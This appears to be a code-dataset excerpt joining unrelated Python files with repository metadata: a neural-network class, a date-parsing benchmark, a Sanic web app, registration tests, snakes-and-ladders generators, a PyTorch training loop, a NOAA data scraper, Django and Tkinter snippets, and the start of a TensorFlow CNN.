def __init__(self, inputLayerSize, hiddenLayersSize, outputLayerSize, epochs, learningStep=0.5, biasNeuron=False):
self.learningStep = learningStep
self.bias = biasNeuron
if biasNeuron:
self.biasNeuron = InputNeuron(1)
self.inputLayer = [ InputNeuron() for _ in range(inputLayerSize) ]
self.hiddenLayers = []
# populate first hidden layer
self.hiddenLayers.append( [ Neuron(inputLayerSize + int(self.bias)) for _ in range(hiddenLayersSize.pop(0)) ] )
# we allow to pass multiple hidden layers
for idx, hiddenLayerSize in enumerate(hiddenLayersSize):
self.hiddenLayers.append( [ Neuron(len(self.hiddenLayers[idx]) + int(self.bias)) for _ in range(hiddenLayerSize) ] )
self.outputLayer = [ Neuron(len(self.hiddenLayers[-1]) + int(self.bias)) for _ in range(outputLayerSize) ]
self.layers = [ self.inputLayer, *self.hiddenLayers, self.outputLayer ]
self.epochs = epochs
def calculateNetworkOutput(self, tp):
# initialize input neurons
for inputNeuron, inpt in zip(self.inputLayer, tp.inputs):
inputNeuron.output = inpt
# calculate output values for layers
# omit input layer, no need to calc outputs there
for idx, layer in enumerate(self.layers[1:]):
for neuron in layer:
inputs = [ neuron.output for neuron in self.layers[idx] ]
if self.bias:
inputs.append(self.biasNeuron.output)
neuron.calcOutput( inputs )
if self.bias:
outputs = []
outputs.append([ neuron.output for neuron in self.layers[-1] ])
for hiddenLayer in self.hiddenLayers[::-1]:
outputs.append([ neuron.output for neuron in hiddenLayer ])
return outputs
else:
return [ neuron.output for neuron in self.layers[-1] ]
def train(self, trainingPatterns):
random.shuffle(trainingPatterns)
for epoch in range(self.epochs):
for tp in trainingPatterns:
self.calculateNetworkOutput(tp)
# calculate error signal for the output layer
for neuron, output in zip(self.layers[-1], tp.outputs):
neuron.calcErrorSignal(tpOutput=output)
# calculate error signals for layers from last but one
for idx, layer in enumerate(self.layers[-2:0:-1]):
for neuronIdx, neuron in enumerate(layer):
weightedSum = np.dot(
a=[ neuronInNextLayer.weights[neuronIdx] for neuronInNextLayer in self.layers[-idx-1] ],
b=[ neuronInNextLayer.errorSignal for neuronInNextLayer in self.layers[-idx-1] ])
neuron.calcErrorSignal(weightedSumErrorSig=weightedSum)
# adjust weights
for layerIdx, layer in enumerate(self.layers[1:]):
for neuron in layer:
if self.bias:
for weightIdx, weight in enumerate(neuron.weights[:-1]):
neuron.weights[weightIdx] += self.learningStep * neuron.errorSignal * self.layers[layerIdx][weightIdx].output
neuron.weights[-1] += self.learningStep * neuron.errorSignal * self.biasNeuron.output
else:
for weightIdx, weight in enumerate(neuron.weights):
neuron.weights[weightIdx] += self.learningStep * neuron.errorSignal * self.layers[layerIdx][weightIdx].output
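# Hypothetical usage sketch (assumes training patterns expose .inputs and
# .outputs lists, as train() and calculateNetworkOutput() expect):
#   mlp = MultiLayerPerceptron(inputLayerSize=2, hiddenLayersSize=[4],
#                              outputLayerSize=1, epochs=1000,
#                              learningStep=0.5, biasNeuron=True)
#   mlp.train(patterns)
#   print(mlp.calculateNetworkOutput(patterns[0]))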
|
[
"ol.winogradow@gmail.com"
] |
ol.winogradow@gmail.com
|
3e80e221a43c5ad66d7a3988f1c9082f2936aca6
|
2b0bd3847f0a5a1823d2f72ecee0ce7069102dd4
|
/benchmark/benchmark_parsing.py
|
8db4bbeee35b794b150c7869ab9f64ffee31b1d8
|
[
"MIT"
] |
permissive
|
stestagg/dateformat
|
d7c7767cd1c90b92a192e1b420bee8340bb8b068
|
3a99e891e586d73fafca85b4c591966ebbc89b36
|
refs/heads/master
| 2022-12-06T23:55:38.851452
| 2022-11-17T11:30:00
| 2022-11-17T11:30:00
| 113,165,866
| 12
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,634
|
py
|
from collections import defaultdict
import random
import time
import datetime
import dateformat
import arrow
import iso8601
import ciso8601
import dateutil.parser
import dateparser
def make_list_of_dates(n=1e4):
dates = []
for i in range(int(n)):
timestamp = random.random() * (time.time() * 2)
dates.append(datetime.datetime.utcfromtimestamp(timestamp))
return dates
def format_date_list(dates):
format = dateformat.DateFormat("YYYY-MM-DD hh:mm:ss")
return [format.format(date) for date in dates]
def benchmark(fn, values):
    before = time.clock()
    fn(values)
    after = time.clock()
    return (after - before) * 1000
def parse_dateformat(dates):
format = dateformat.DateFormat("YYYY-MM-DD hh:mm:ss")
for date in dates:
assert isinstance(format.parse(date), datetime.datetime)
def parse_strptime(dates):
for date in dates:
assert isinstance(datetime.datetime.strptime(date, "%Y-%m-%d %H:%M:%S"), datetime.datetime)
def parse_dateutil(dates):
for date in dates:
assert isinstance(dateutil.parser.parse(date), datetime.datetime)
def parse_dateparser(dates):
for date in dates:
assert isinstance(dateparser.parse(date), datetime.datetime)
def parse_dateparser_guided(dates):
for date in dates:
assert isinstance(dateparser.parse(date, date_formats=['%Y-%m-%d %H:%M:%S']), datetime.datetime)
def parse_iso8601(dates):
for date in dates:
assert isinstance(iso8601.parse_date(date), datetime.datetime)
def parse_ciso8601(dates):
for date in dates:
assert isinstance(ciso8601.parse_datetime(date), datetime.datetime)
def parse_arrow(dates):
for date in dates:
assert isinstance(arrow.get(date, "YYYY-MM-DD hh:mm:ss"), arrow.Arrow)
def main():
dates = make_list_of_dates()
date_strings = format_date_list(dates)
fns = [
parse_dateformat,
parse_strptime,
parse_dateutil,
parse_arrow,
parse_dateparser,
parse_dateparser_guided,
parse_iso8601,
parse_ciso8601
]
# fns = [
# parse_dateformat,
# ]
timings = defaultdict(list)
for i in range(3):
random.shuffle(fns)
for fn in fns:
timings[fn].append(benchmark(fn, date_strings))
print("method,time_ms")
for fn, times in timings.items():
fastest = min(times)
fn_name = fn.__name__.replace("parse_", "")
print(f"{fn_name},{fastest}")
if __name__ == '__main__':
main()
|
[
"stephenstagg@Stephens-MacBook-Pro.local"
] |
stephenstagg@Stephens-MacBook-Pro.local
|
e91913141254ccbf8026f7e621212cbf03a9054f
|
5f6e26fabdec868a3d4851de827054ca58d1c2af
|
/server/src/web_app/app.py
|
6493854d5fd3961bd3967d905aa002e25db1e172
|
[] |
no_license
|
abingham/runner_repl
|
fd2a1187db27cca4f5971d1f846a68b091a33199
|
e498739a34f289c40a4cdfcc7675c94e1fb18ebc
|
refs/heads/master
| 2021-05-02T10:40:06.632053
| 2018-03-09T08:46:29
| 2018-03-09T08:46:29
| 120,760,922
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,893
|
py
|
"""Create an run the aiohttp Application.
"""
import aiohttp
import docker
import docker.errors
from sanic import Sanic
import sanic.exceptions
from .handlers import Handler
from .logging import logging_config
def _configure_routes(app, repl_port, image_name, network_name):
"Add routes to the application."
handler = Handler(image_name=image_name,
network_name=network_name,
repl_port=repl_port)
app.add_route(handler.create_repl_handler,
'/repl/<kata>/<animal>',
methods=['POST'])
app.add_route(handler.delete_repl_handler,
'/repl/<kata>/<animal>',
methods=['DELETE'])
app.add_websocket_route(handler.websocket_handler, '/repl/<kata>/<animal>')
app.listener('after_server_stop')(
lambda app, loop: handler.close())
def create_app(repl_port, network_name, image_name, log_level):
"""Construct an Application instance.
It will be configured with middleware and startup/shutdown handlers.
"""
app = Sanic(log_config=logging_config(log_level))
@app.listener('before_server_start')
async def startup(app, loop):
app.config.docker_client = docker.from_env()
app.config.http_session = aiohttp.ClientSession()
@app.listener('after_server_stop')
async def cleanup(app, loop):
await app.config.http_session.close()
@app.exception(docker.errors.NotFound)
def translate_not_found(request, exception):
raise sanic.exceptions.NotFound(
message=str(exception))
@app.exception(docker.errors.APIError)
def translate_api_error(request, exception):
raise sanic.exceptions.SanicException(
message=str(exception),
status_code=exception.status_code)
_configure_routes(app, repl_port, image_name, network_name)
return app
|
[
"austin.bingham@gmail.com"
] |
austin.bingham@gmail.com
|
4671e43342e0179795ecbef9138be7fb1df261e3
|
57885bbb4f2005a9caac065f59fb7bb59f21d708
|
/Week_9/finance/register/test_register.py
|
5ad6596fb1805cd789a63decff3f8768a132784b
|
[] |
no_license
|
sprdave/CS50-2021
|
af9922edbe07ea4d1e01abc7fde6c708c868e904
|
4386382492200942a4982b74d1a5c8836499c8b4
|
refs/heads/main
| 2023-08-29T21:58:25.435901
| 2021-10-27T10:05:22
| 2021-10-27T10:05:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,167
|
py
|
from register import register, _is_user_present
from app_config import db
from app_config import NAME_EMPTY, PSW_EMPTY, PSW_WEAK, USER_PRESENT, \
DB_ERROR, NOT_ADDED
from mock import patch
import pytest
import sqlite3
@pytest.fixture()
def mock_users_table():
"""create inmemory db `users` and fill it with one record"""
db = _make_users_db()
user_record = ("Dick", "123qwe", 10000)
db.cursor().execute("INSERT INTO users VALUES (NULL, ?, ?, ?);", user_record)
db.commit()
return db
@pytest.fixture()
def mock_bad_users_table():
"""create bad db comnnection"""
return _make_broken_users_db()
def test_empty_name():
"""should return tuple with users id=-1 and message"""
assert register("", "123", db) == (-1, NAME_EMPTY)
def test_empty_psw():
"""should return tuple with users id=-1 and message"""
assert register("Bob", "", db) == (-1, PSW_EMPTY)
def test_weak_psw():
"""should return tuple with users id=-1 and message"""
assert register("Bob", "123", db) == (-1, PSW_WEAK)
assert register("Bob", "1a3b", db) == (-1, PSW_WEAK)
assert register("Bob", "123456789", db) == (-1, PSW_WEAK)
assert register("Bob", "qwertyuopa", db) == (-1, PSW_WEAK)
def test_user_present(mock_users_table):
"""should return id=-1 and message if user present"""
with patch('register.db', mock_users_table) as _:
assert register("Dick", "qwer1234", mock_users_table) == (-1, USER_PRESENT)
def test_broken_table(mock_bad_users_table):
"""should return id=-1 and message if error in db"""
with patch('register.db', mock_bad_users_table) as _:
assert register("Bob", "qwer1234", mock_bad_users_table) == (-1, DB_ERROR)
def test_is_user_present(mock_users_table, mock_bad_users_table ):
"""test fanction functionality"""
with patch('register.db', mock_users_table ) as _:
assert _is_user_present("Dick", mock_users_table) == (True, (-1, USER_PRESENT))
with patch('register.db', mock_users_table ) as _:
assert _is_user_present("Bob", mock_users_table) == (False, (-1, NOT_ADDED))
with patch('register.db', mock_bad_users_table) as _:
assert _is_user_present("Dick", mock_bad_users_table) == (False, (-1, DB_ERROR))
def test_register_Ok(mock_users_table):
"""should return id and name if user add success"""
with patch('register.db', mock_users_table) as _:
db = mock_users_table
result = register("Bob", "1234qwert", db)
assert result[0] > 0
assert result[1] == "Bob"
# helpers =======================
def _make_users_db():
"""create fake table in the memory"""
db = sqlite3.connect(":memory:")
cur = db.cursor()
cur.execute("""CREATE TABLE users
(id INTEGER,
username TEXT NOT NULL,
hash TEXT NOT NULL,
cash NUMERIC NOT NULL DEFAULT 10000.00,
PRIMARY KEY(id))""")
db.commit()
return db
def _make_broken_users_db():
"""create broken table in the memory"""
db = sqlite3.connect(":memory:")
return db
|
[
"shkliarskiy@gmail.com"
] |
shkliarskiy@gmail.com
|
e33e2bedd7fe5454ae3ed59196d7d6882a8db79d
|
8473bafb01382d9b257dc39acba95b5c4d20b576
|
/Lab13/p2/main.py
|
c889123224778294d9d27bc61b85a560c0a382c5
|
[] |
no_license
|
rsvalentin/PP
|
616a5d2178d4894930d15e17e7150a7724f9ef88
|
8887a23620fe6bc46d8e086ed26e540274e2d868
|
refs/heads/main
| 2023-06-10T09:15:23.473559
| 2021-05-25T10:16:58
| 2021-05-25T10:16:58
| 382,658,990
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 169
|
py
|
n=int(input("Introdu n ="))
init_list=(n ** 2 for n in range(n))
init_list=list(init_list)
print(init_list)
res=list(filter(lambda x: x % 2 == 0 , init_list))
print(res)
|
[
"romann.valentin@gmail.com"
] |
romann.valentin@gmail.com
|
b135e59d514744f8cb66c3219ec2acd7c9c7bd00
|
f0967325d75f8423c7d8971502c02e82d0249305
|
/CMSE202/in_class_assignments/day-22-in-class/noaa_scraper.py
|
aae1cc4fff24078195ed19c95c57e97f4e25de78
|
[] |
no_license
|
Mart1973/bioinformatics-iGEM-2020
|
9e7a0dbcb058c2de875cf0931d1f185ca8ebc52c
|
acf6ffdac249c6f4013c1c30b55b9eb7a1a14fe9
|
refs/heads/master
| 2022-06-10T16:19:01.705442
| 2020-05-07T03:05:01
| 2020-05-07T03:05:01
| 261,261,836
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,113
|
py
|
# libraries needed by this notebook
import os
import numpy as np
from html.parser import HTMLParser
from urllib import parse
from urllib.request import urlopen
from urllib.request import urlretrieve
#following are needed for the progress bar
from ipywidgets import FloatProgress
from IPython.display import display
# use glob to collect filenames from a directory
from glob import glob
# We are going to create a class called LinkParser that inherits some
# methods from HTMLParser which is why it is passed into the definition
class LinkParser(HTMLParser):
# This is a function that HTMLParser normally has
# but we are adding some functionality to it
def handle_starttag(self, tag, attrs):
        # We are looking for the beginning of a link. Links normally look
# like <a href="www.someurl.com"></a>
if tag == 'a':
for (key, value) in attrs:
if key == 'href':
# We are grabbing the new URL. We are also adding the
# base URL to it. For example:
# www.netinstructions.com is the base and
# somepage.html is the new URL (a relative URL)
#
# We combine a relative URL with the base URL to create
# an absolute URL like:
# www.netinstructions.com/somepage.html
newUrl = parse.urljoin(self.baseUrl, value)
                    # And add it to our collection of links:
self.links = self.links + [newUrl]
# This is a new function that we are creating to get links
# that our spider() function will call
def getLinks(self, url):
self.links = []
# Remember the base URL which will be important when creating
# absolute URLs
self.baseUrl = url
# Use the urlopen function from the standard Python 3 library
response = urlopen(url)
# Make sure that we are looking at HTML and not other things that
# are floating around on the internet (such as
# JavaScript files, CSS, or .PDFs for example)
if 'text/html' in response.getheader('Content-Type'):
htmlBytes = response.read()
# Note that feed() handles Strings well, but not bytes
# (A change from Python 2.x to Python 3.x)
htmlString = htmlBytes.decode("utf-8")
self.feed(htmlString)
return '',self.links #htmlString, self.links
if 'text/plain' in response.getheader('Content-Type'):
return url,[]
else:
return "",[]
# And finally here is our spider. It takes in an URL, a word to find,
# and the number of pages to search through before giving up
def noaa_spider(url, word, maxPages):
if not os.path.isdir('data'):
os.mkdir('data')
pagesToVisit = [url]
textfiles = [];
numberVisited = 0
foundWord = False
urlsVisited = set()
foundFiles = set()
progressBar = FloatProgress(min=0, max=maxPages)
display(progressBar)
progressBar.value = 0
# The main loop. Create a LinkParser and get all the links on the page.
# Also search the page for the word or string
# In our getLinks function we return the web page
# (this is useful for searching for the word)
# and we return a set of links from that web page
# (this is useful for where to go next)
while numberVisited < maxPages and pagesToVisit != [] and not foundWord:
# Start from the beginning of our collection of pages to visit:
url = pagesToVisit[0]
pagesToVisit = pagesToVisit[1:]
#try:
#print(numberVisited, "Visiting:", url)
parser = LinkParser()
if url not in urlsVisited:
urlsVisited.add(url)
if '.txt' in url:
if word in url:
textfiles = textfiles + [url]
foundFiles.add(url)
print("FOUND ", url)
name='./data/'+url.split('/')[-1]
if not os.path.isfile(name):
print('downloading...',name)
urlretrieve(url,name)
else:
print('file exists...',name)
else:
numberVisited = numberVisited +1
progressBar.value = numberVisited
data, links = parser.getLinks(url)
# Add the pages that we visited to the end of our collection
# of pages to visit:
pagesToVisit = pagesToVisit + links
return foundFiles
def read_data_column(filename, col=8):
f = open(filename, 'r')
filename
air_temperature = []
for row in f:
data = row.split()
temp = float(data[col])
if(temp < -9000): # Check for valid data
#print('IsNan')
            if(air_temperature == []): # First point in series
temp = 0
else:
temp=air_temperature[-1] #Repeat previous data point
else:
temp = temp*9.0/5.0+32
if(temp != []):
air_temperature.append(temp)
f.close()
return air_temperature
def get_airtemperature_from_files():
    # Read all .txt data files downloaded into the data directory
from sys import platform
files = glob('./data/*.txt');
files.sort();
progressBar = FloatProgress(min=0, max=len(files))
display(progressBar)
progressBar.value = 0
air_temperature = []
for file in files:
progressBar.value = progressBar.value + 1
if platform == "win32":
name='.\data'+file.split('data')[-1]
else:
name='./data'+file.split('data')[-1]
filename = name
print('reading...',name)
air_temperature = air_temperature + read_data_column(filename)
return air_temperature
def get_noaa_temperatures(url, name, maxdepth=100):
    # Call the main noaa_spider function and search for the given word
    files = noaa_spider(url, name, maxdepth)
return get_airtemperature_from_files()
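# Hypothetical usage sketch: the URL and search word below are placeholders, not
# values from the original notebook. Running this crawls the listing page, downloads
# matching .txt files into ./data/, and collects the temperature column. It assumes
# the same notebook environment (ipywidgets available for the progress bars).
if __name__ == '__main__':
    base_url = "https://www.example.gov/noaa-data/"  # placeholder URL
    temps = get_noaa_temperatures(base_url, "crn", maxdepth=50)
    print("collected", len(temps), "temperature readings")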
|
[
"jense117@msu.edu"
] |
jense117@msu.edu
|
2a12c684d5a4e85e4633e09308985baa95ee93ab
|
6d58114b26a2a5203c2e9b23991fa38008cc076b
|
/mainapp/migrations/0029_auto_20160215_0854.py
|
3ac289dd98e051721fea437831f7f760c3e49ed5
|
[] |
no_license
|
Ancelada/gls
|
498156c72aea45706f008041b4e69fcbad550c89
|
2801f1c61553e76c69ba1079658adedfe5e9f494
|
refs/heads/master
| 2020-04-16T02:30:12.632726
| 2016-06-06T12:07:26
| 2016-06-06T12:07:26
| 49,003,490
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,229
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-02-15 05:54
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('mainapp', '0028_auto_20160215_0846'),
]
operations = [
migrations.RemoveField(
model_name='verticeswall',
name='Wall',
),
migrations.AddField(
model_name='verticesbuilding',
name='LoadLandscape',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='mainapp.LoadLandscape'),
),
migrations.AddField(
model_name='verticesfloor',
name='LoadLandscape',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='mainapp.LoadLandscape'),
),
migrations.AddField(
model_name='verticeskabinet_n_outer',
name='LoadLandscape',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='mainapp.LoadLandscape'),
),
migrations.DeleteModel(
name='VerticesWall',
),
]
|
[
"danydonatto@pochta.ru"
] |
danydonatto@pochta.ru
|
de20f91f04f9d5ba1bd320eba6830c2ad6d878c6
|
5df73356ab44d1f6a74deaadccf1c9f0de2dee3b
|
/generators.py
|
070cfd9fed8c005692f274f4f3c2996e25efece7
|
[] |
no_license
|
Furtado145/Snakers-and-Ladders
|
8020a72d2a5ac1636e0957016e1bd551eafa5908
|
c611c6c25bb297c564bf318e0528e832575f1871
|
refs/heads/master
| 2023-06-17T00:16:41.568056
| 2021-07-07T18:28:19
| 2021-07-07T18:28:19
| 371,570,668
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,013
|
py
|
import numpy as np
board = list(range(1, 101))
# Generate a dict of random snakes in game
def gen_snakes(x):
dict_snk = {}
v_max = len(board) - 10
v_min = 10
for i in range(x):
key = np.random.randint(v_min, v_max)
if key in dict_snk:
key = np.random.randint(v_min, v_max)
value = key - np.random.randint(5, 10)
if value in dict_snk:
value = key - np.random.randint(5, 10)
dict_snk[key] = value
return dict_snk
# Generate a dict of random ladders in game
def gen_ladders(x):
snk = gen_snakes(x)
dict_lad = {}
v_min = 5
v_max = len(board) - 20
for i in range(x):
key = np.random.randint(v_min, v_max)
if key in dict_lad or key in snk:
key = np.random.randint(v_min, v_max)
value = key + np.random.randint(5, 10)
if value in dict_lad or value in snk:
value = key + np.random.randint(5, 10)
dict_lad[key] = value
return dict_lad
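# Note that the duplicate checks above redraw only once, so a colliding key can
# still slip through. A hedged alternative (not the original approach) that keeps
# redrawing until the key is genuinely unused:
import numpy as np  # already imported at the top of this file

def gen_unique_key(existing, v_min, v_max):
    """Draw a random key in [v_min, v_max) that is not already present in `existing`."""
    key = np.random.randint(v_min, v_max)
    while key in existing:
        key = np.random.randint(v_min, v_max)
    return key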
|
[
"felipeffurtado.eng@gmail.com"
] |
felipeffurtado.eng@gmail.com
|
4c7323b9f3ee5682e4e59b2d3ea3a2b23f93fdd5
|
5bda4162d129daf1e4b0ba8191ebce503df0042d
|
/S9/wrapper/train_test.py
|
d051e45110fa420819308df39e55d82ee7731a22
|
[] |
no_license
|
MANU-CHAUHAN/eva5
|
72a6de32fe895087fdd6a7ae7d87b88c6ddc638c
|
8a1cd5e5295752814e019b4d17b1701fb932dffd
|
refs/heads/master
| 2023-01-08T11:25:35.208293
| 2020-11-01T00:28:18
| 2020-11-01T00:28:18
| 287,816,888
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,015
|
py
|
import torch
from wrapper import utility, CONSTANTS
def train_test(*, model, device, train_loader, optimizer, epochs, scheduler, test, test_loader, tracker, loss_fn,
l1_lambda=None, l2_lambda=None):
if CONSTANTS.L1 in utility.get_config_details()[CONSTANTS.REGULARIZATION].keys():
        l1_lambda = float(utility.get_config_details()[CONSTANTS.REGULARIZATION][CONSTANTS.L1])  # no trailing comma, which would turn this into a 1-tuple
if CONSTANTS.L2 in utility.get_config_details()[CONSTANTS.REGULARIZATION].keys():
l2_lambda = float(utility.get_config_details()[CONSTANTS.REGULARIZATION][CONSTANTS.L2])
if l1_lambda and l2_lambda:
type_ = "L1L2"
elif not l1_lambda and l2_lambda:
type_ = "L2"
elif l1_lambda and not l2_lambda:
type_ = "L1"
else:
type_ = "w/o_L1L2"
for epoch in range(epochs):
model.train()
l1 = torch.tensor(0, requires_grad=False)
correct = 0
processed = 0
train_loss = 0
print(f"\n\nepoch: {epoch + 1}")
# pbar = tqdm(train_loader)
if l2_lambda:
optimizer.param_groups[0]['weight_decay'] = l2_lambda
print(train_loader)
for i, data in enumerate(train_loader):
inputs, target = data
inputs, target = inputs.to(device), target.to(device)
            optimizer.zero_grad()  # set the gradients to zero so they don't accumulate across batches
output = model(inputs) # model's output
loss = loss_fn(output, target)
            if l1_lambda:
                l1 = torch.tensor(0.0)  # reset the L1 term for every batch
                for param in model.parameters():
                    l1 = l1 + param.abs().sum()
                loss = loss + l1_lambda * l1  # keep the tensor (not .item()) so the penalty reaches the gradients
loss.backward()
optimizer.step()
pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability
correct += pred.eq(target.view_as(pred)).sum().item()
            processed += len(inputs)  # count samples; len(data) would count the (inputs, target) pair
train_loss += loss.item()
if i % 100 == 0:
print(f"epoch:{epoch + 1}.... batch:{i + 1}...loss:{train_loss:.4f}")
train_loss /= len(train_loader.dataset)
acc = 100 * correct / processed
tracker[type_]['train_losses'].append(train_loss)
tracker[type_]['train_accuracy'].append(acc)
# pbar.set_description(desc=f'loss={loss.item()} batch_id={batch_idx}')
if scheduler:
print(f'\n>>>lr: {scheduler.get_last_lr()[0]}')
scheduler.step()
print(f"\nEpoch : {epoch + 1} Train loss:{train_loss:.4f}")
print("\nTrain set: \t\t Accuracy: {}/{} ({:.6f}%)".format(correct, len(train_loader.dataset),
100.0 * correct / len(train_loader.dataset)))
if test:
model.eval()
test_loss = 0
correct = 0
with torch.no_grad():
for data, target in test_loader:
data, target = data.to(device), target.to(device)
output = model(data)
test_loss += loss_fn(output, target).sum().item() # sum up batch loss
pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability
correct += pred.eq(target.view_as(pred)).sum().item()
for i in range(len(pred)):
if pred[i] != target[i]:
tracker[type_]['misclassified'].append((data[i], pred[i], target[i]))
test_loss /= len(test_loader.dataset)
t_acc = 100.0 * correct / len(test_loader.dataset)
tracker[type_]['test_losses'].append(test_loss)
tracker[type_]['test_accuracy'].append(t_acc)
print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.6f}%)\n'.format(
test_loss, correct, len(test_loader.dataset), t_acc))
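# A minimal, self-contained sketch of L1 regularization that stays inside the autograd
# graph (the tiny model and data below are placeholders, not this project's wrapper API):
# the penalty must remain a tensor so it contributes to the gradients, which is why the
# training loop above adds l1 rather than l1.item().
if __name__ == '__main__':
    import torch.nn as nn

    model = nn.Linear(10, 2)
    criterion = nn.CrossEntropyLoss()
    x, y = torch.randn(4, 10), torch.randint(0, 2, (4,))

    loss = criterion(model(x), y)
    l1 = sum(p.abs().sum() for p in model.parameters())  # a tensor, not a Python float
    loss = loss + 1e-5 * l1                               # keeps gradients flowing through the penalty
    loss.backward()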
|
[
"manuchauhan1992@gmail.com"
] |
manuchauhan1992@gmail.com
|
f61c4f77665b0ad6f34b7a5106028f6df2ae3df9
|
e79e3974f877be62f96bb575bbe84c5fe70e68b7
|
/ex041.py
|
b186cea44aeea07cef29bbdf57b65dbf251040fe
|
[] |
no_license
|
anncarln/start-python
|
885ea5b8da8533035ab90edc1e7b52741421b76a
|
964f3ed54a2a05f3999bb30bdcd93dbdf816d0e0
|
refs/heads/master
| 2023-06-29T01:57:47.190743
| 2021-08-08T03:18:31
| 2021-08-08T03:18:31
| 282,767,791
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 470
|
py
|
from datetime import datetime
ano_nasc = int(input('Ano de nascimento: '))
today = datetime.now()
ano_atual = today.year
idade = ano_atual - ano_nasc
if idade <= 9:
print('Classificação do atleta: MIRIM.')
elif idade <= 14:
print('Classificação do atleta: INFANTIL.')
elif idade <= 19:
print('Classificação do atleta: JÚNIOR.')
elif idade <= 25:
print('Classificação do atleta: SÊNIOR.')
else:
print('Classificação do atleta: MASTER.')
|
[
"carolinanna93@gmail.com"
] |
carolinanna93@gmail.com
|
5b48c495ff9736b4c26039bbe62a36c8f57abbbd
|
2923e3a3f4244606aba6d86f8e252db58758f359
|
/happy_client/cms_plugins.py
|
e7d2d9c6790a7fe8f6a9f7f05b6b1f2a1d0071b5
|
[] |
no_license
|
AlexeyKutepov/telegraph-factory-project
|
d026ade3f929b16ec2821637443a5316696de402
|
888437cfadaf78e621b4b4ae52f9eebedf8f3ec7
|
refs/heads/master
| 2021-01-11T11:07:32.380736
| 2017-01-20T09:01:14
| 2017-01-20T09:01:14
| 54,378,224
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 545
|
py
|
from cms.plugin_base import CMSPluginBase
from cms.plugin_pool import plugin_pool
from .models import HappyClient
from django.utils.translation import ugettext_lazy as _
class HappyClientPlugin(CMSPluginBase):
model = HappyClient
name = _("Happy Client Plugin")
render_template = "happy_client.html"
cache = False
def render(self, context, instance, placeholder):
context = super(HappyClientPlugin, self).render(context, instance, placeholder)
return context
plugin_pool.register_plugin(HappyClientPlugin)
|
[
"a.kutepov@voskhod.ru"
] |
a.kutepov@voskhod.ru
|
134f54e4d3b4d14b56b89060ab1e1f65a93c8446
|
b8e6e7d7a1fa78308fdf2c24b4b77cb1827706c5
|
/Tkinter-button.py
|
887fc5984cec006d3271973aee4d9a3749b39d0e
|
[] |
no_license
|
Shaxpy/Experiments-with-GUI
|
14496095c9dac30513352ffe0adda9a19520a584
|
231d6af8435ce5f2b0a73d8f9000837c4d2ee919
|
refs/heads/master
| 2020-12-03T17:57:46.159490
| 2020-06-14T22:31:24
| 2020-06-14T22:31:24
| 231,419,750
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 392
|
py
|
import tkinter
from tkinter import *
root=tkinter.Tk()
root.title("Buttons")
root.geometry("400x500")
bt=Button(root,text="Button 1",width=15,height=2)
bt.pack()
#grid()
#place() ---pixels
bt2=Button(root,text="Button 2",width=15,height=2)
bt2.pack()
bt3=Button(root,text="Button 3",width=15,height=2)
bt3.pack()
bt4=Button(root,text="Link")
bt4.pack(fill=BOTH)
root.mainloop()
|
[
"noreply@github.com"
] |
Shaxpy.noreply@github.com
|
e278cbf87b2c2687625f9ded9ff70b3fd8868829
|
fc4718c75a259c7878970916f33bc420e82562d0
|
/tensorflow_cnn/other/model_train.py
|
8dcc990b079e002eb58d1416b8134b0ee3bfd7da
|
[] |
no_license
|
DzrJob/spider
|
b2f15405caa93ecf185296a2a4ed8b9b4c5123c3
|
cd4b105433a6a83def2bf11c046a3769204cd44e
|
refs/heads/master
| 2020-05-04T00:24:48.535406
| 2019-05-07T14:52:18
| 2019-05-07T14:52:18
| 178,880,953
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,121
|
py
|
# -*- coding:utf-8 -*-
# name: model_train.py
import tensorflow as tf
from datetime import datetime
from util import get_next_batch
from captcha_gen import CAPTCHA_HEIGHT, CAPTCHA_WIDTH, CAPTCHA_LEN, CAPTCHA_LIST
def weight_variable(shape, w_alpha=0.01):
"""
    Initialize a weight tensor
:param shape:
:param w_alpha:
:return:
"""
initial = w_alpha * tf.random_normal(shape)
return tf.Variable(initial)
def bias_variable(shape, b_alpha=0.1):
"""
    Initialize a bias tensor
:param shape:
:param b_alpha:
:return:
"""
initial = b_alpha * tf.random_normal(shape)
return tf.Variable(initial)
def conv2d(x, w):
"""
    Convolution layer: linear combination over local patches, stride 1; 'SAME' padding keeps the image size unchanged (zero margin)
:param x:
:param w:
:return:
"""
return tf.nn.conv2d(x, w, strides=[1, 1, 1, 1], padding='SAME')
def max_pool_2x2(x):
"""
    Pooling layer: max pooling takes the maximum of each region as its feature; a 2x2 pool halves the image size
:param x:
:return:
"""
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
def cnn_graph(x, keep_prob, size, captcha_list=CAPTCHA_LIST, captcha_len=CAPTCHA_LEN):
"""
    Three-layer convolutional neural network
    :param x: training images
    :param keep_prob: dropout keep probability
    :param size: (height, width)
:param captcha_list:
:param captcha_len:
:return: y_conv
"""
    # reshape the input into a 4-D tensor (batch, height, width, channels)
image_height, image_width = size
x_image = tf.reshape(x, shape=[-1, image_height, image_width, 1])
    # first layer
    # filters are 3x3x1 and produce 32 feature maps, i.e. 32 filters
    w_conv1 = weight_variable([3, 3, 1, 32])  # 3x3 window; 32 kernels extract 32 feature planes from the single input plane
b_conv1 = bias_variable([32])
